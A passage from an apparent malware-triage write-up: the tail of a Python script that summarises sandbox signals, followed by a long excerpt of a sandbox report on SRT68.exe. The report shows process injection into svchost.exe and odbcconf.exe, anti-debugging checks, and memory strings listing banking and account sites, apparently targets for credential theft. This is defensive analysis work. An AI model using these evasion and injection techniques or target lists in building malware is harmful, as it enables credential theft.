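    out = defaultdict(lambda: {"signals": defaultdict(int), "sleep_loops": []})
    pending = {}  # (proc, tid) -> sleep count waiting for its time row
    for proc, tid, rest in parse_rows(text):
        entry = out[proc]
        for name, rx in SIGNALS.items():
            if rx.search(rest):
                entry["signals"][name] += 1
        if m := SLEEP_COUNT.search(rest):
            pending[(proc, tid)] = int(m.group(1))
        elif m := SLEEP_TIME.search(rest):
            calls = pending.pop((proc, tid), None)
            total = int(m.group(1))
            if calls:
                entry["sleep_loops"].append(
                    {"tid": tid, "calls": calls, "total": total, "per_call": total // calls}
                )
    return {p: {"signals": dict(e["signals"]), "sleep_loops": e["sleep_loops"]}
            for p, e in out.items()}


def triage_notes(summary):
    """One human-readable line per process that showed any signal."""
    notes = []
    for proc, entry in summary.items():
        name = proc.rsplit("\\", 1)[-1]
        parts = [f"{n}x{c}" for n, c in sorted(entry["signals"].items())]
        for loop in entry["sleep_loops"]:
            parts.append(f"sleep loop tid {loop['tid']}: {loop['calls']} calls of "
                         f"{loop['per_call']} each (sandbox stall)")
        if parts:
            notes.append(f"{name}: " + "; ".join(parts))
    return notes


if __name__ == "__main__":
    for note in triage_notes(summarise(SAMPLE_ROWS)):
        print(note)
```

                Run against the full report text the same way; the parser ignores rows that do not start with "Source:". Injected-into processes like svchost.exe and odbcconf.exe are the ones to watch here, since the PEB reads and the sleep loop live in the injected code (the 0x037xxxxx and 0x04Exxxxx regions), not in the host binaries.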
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0100445A
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0100C75C
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100C6D1 FindFirstFileW,FindClose,0_2_0100C6D1
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100EF95
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100F0F2
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100F3F3
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_010037EF
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01003B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01003B12
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100BCBC
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EEC6C0 FindFirstFileW,FindNextFileW,FindClose,4_2_02EEC6C0
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FA49A0
                Source: 9u7-5030R1.4.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 9u7-5030R1.4.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 9u7-5030R1.4.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 9u7-5030R1.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 9u7-5030R1.4.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 9u7-5030R1.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 9u7-5030R1.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 9u7-5030R1.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 9u7-5030R1.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: firefox.exe, 00000008.00000002.1795697424.000001A0B08AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 9u7-5030R1.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 9u7-5030R1.4.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: 9u7-5030R1.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: VdxisCThGA.exe, 00000006.00000002.3834689695.0000000000E9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                Source: odbcconf.exe, 00000004.00000002.3834317306.0000000003213000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 9u7-5030R1.4.drBinary or memory string: global block list test formVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 9u7-5030R1.4.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 9u7-5030R1.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 9u7-5030R1.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 9u7-5030R1.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\SRT68.exe API call chain: ExitProcess graph end node (graph_0-104367)
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\odbcconf.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004176E3 LdrLoadDll,2_2_004176E3
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01013F09 BlockInput,0_2_01013F09
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FA3B3A
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00FD5A7C
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA4B37 LoadLibraryA,GetProcAddress,0_2_00FA4B37
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_015B0648 mov eax, dword ptr fs:[00000030h]0_2_015B0648
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_015B1C58 mov eax, dword ptr fs:[00000030h]0_2_015B1C58
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_015B1CB8 mov eax, dword ptr fs:[00000030h]0_2_015B1CB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h] | 2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h] | 2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h] | 2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h] | 2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h] | 2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h] | 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0380625D mov eax, dword ptr fs:[00000030h] | 2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h] | 2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h] | 2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h] | 2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h] | 2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h] | 2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h] | 2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h] | 2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h] | 2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h] | 2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h] | 2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h] | 2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h] | 2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h] | 2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h] | 2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03760124 mov eax, dword ptr fs:[00000030h] | 2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h] | 2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h] | 2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h] | 2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h] | 2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h] | 2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h] | 2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] | 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] | 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] | 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] | 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] | 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] | 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h] | 2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h] | 2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h] | 2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h] | 2_2_037F61C3
